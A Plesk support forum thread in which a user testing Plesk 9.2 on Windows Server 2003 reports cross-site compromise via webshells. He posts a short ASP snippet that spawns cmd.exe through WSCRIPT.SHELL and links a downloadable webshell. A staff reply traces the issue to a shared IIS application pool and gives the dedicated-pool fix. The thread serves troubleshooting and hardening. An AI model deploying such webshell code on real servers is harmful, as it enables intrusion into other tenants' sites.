• Our team is looking to connect with folks who use email services provided by Plesk, or a premium service. If you'd like to be part of the discovery process and share your experiences, we invite you to complete this short screening survey. If your responses match the persona we are looking for, you'll receive a link to schedule a call at your convenience. We look forward to hearing from you!
  • The BIND DNS server has already been deprecated and removed from Plesk for Windows.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS. We strongly recommend transitioning to Microsoft DNS within the next 6 weeks, before the Plesk 18.0.70 release.
  • The Horde component is removed from Plesk Installer. We recommend switching to another webmail software supported in Plesk.

Server Plesk 9.2 Hacked

N

Nguyen Thang Long

Guest
I am testing plesk 9.2 on Windows server 2003.
I tried hack this server by webshell (aspx & asp)
Example:
When i ran :
<%@ Language=VBScript %>
<%
On Error Resume Next
Dim oScript
Dim gURL
gURL = Request.ServerVariables("APPL_PHYSICAL_PATH")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Call oScript.Run ("c:\\WINDOWS\\system32\\cmd.exe",1,True)
%>
Then task manager of server running file cmd.exe by users is : IWAM_Plesk(Default)
Or when i used webshell (http://www.guru.net.vn/kshell_1.2.zip) , i can hacked website of other users in this server.
I used plesk tools maked sure permission of server , but it is not fix that problems.

I can't fix , who can secure , and fix that error ? Help me ?

Thanks so much !
 
I have reported this problem to developers with high priority. I will update this thread with results as soon as I receive it.
 
Problem still under developer's investigation. I will update thread as soon as I receive any useful information.
 
This issue caused because of by default all users application works inside single AppPool. So they probably has access to each other contents.

This issue can be resolved, if you set <domain> -> Web Hosting Settings -> 'Use dedicated pool' on every domain (you can use mass domains operations either). And additionally you can set Home -> IIS Application Pool -> Global Settings -> Always place all domains in the shared application pool option. It will run each site in separated pool, and their applications couldn't read each other.
 
You must log in or register to reply here.

Similar threads

M
Resolved Plesk restore from a ZIP after server failure.
Replies
0
Views
461
mad_inventor
M
V
Issue Smarthost + SRS = relay?
Replies
2
Views
10K
vanlier
V
LionKing
Issue Weak Algorithm Warning (DSA1024) for Plesk Repositories on Ubuntu 24.04 LTS
Replies
5
Views
665
LionKing
LionKing
B
Issue High latency, unreliable performance & 522 errors on a Plesk server that ran fine for 6+ months
Replies
8
Views
2K
HHawk
HHawk
H
Question Decommissioning a hacked Plesk/CentOS 7/Plesk web server, and migrating all sites to CentOS 7/Plesk
Replies
2
Views
1K
Huey Tinman
H
Back
Top